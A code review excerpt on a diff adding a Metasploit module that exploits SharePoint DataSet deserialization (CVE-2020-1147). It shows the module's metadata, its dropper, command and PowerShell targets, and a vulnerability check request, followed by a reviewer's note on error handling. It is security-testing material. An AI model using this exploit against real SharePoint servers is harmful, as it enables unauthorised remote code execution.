modules/exploits/windows/http/sharepoint_data_deserialization.rb

```diff
@@ -0,0 +1,173 @@
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SharePoint DataSet / DataTable Deserialization',
+        'Description' => %q{
+          A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated
+          attacker to execute code within the context of the SharePoint application service. The vulnerability is
+          related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation.
+          In a default configuration, a Domain User account is sufficient to access SharePoint and exploit this
+          vulnerability.
+        },
+        'Author' => [
+          'Steven Seeley', # detailed vulnerability write up and the DataSet gadget
+          'Soroush Dalili', # usable endpoint testing and confirmation
+          'Spencer McIntyre' # this metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-1147'],
+          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_dropper
+          ],
+          [
+            'Windows Command',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_command,
+            'Space' => 7500
+          ],
+          [
+            'Windows Powershell',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_powershell
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-03-02', # TODO: update me
+        'Notes' =>
+        {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
+      OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
+      OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'quicklinks.aspx'),
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'vars_get' => {
+        'Mode' => 'Suggestion'
+      }
+    })
+
+    return CheckCode::Safe unless res&.code == 200
```

Comment:
Well technically the authentication could fail here, so probably best to account for this first before returning `CheckCode::Safe`. Also its possible the request could have timed out so I'm not sure this takes that into account either.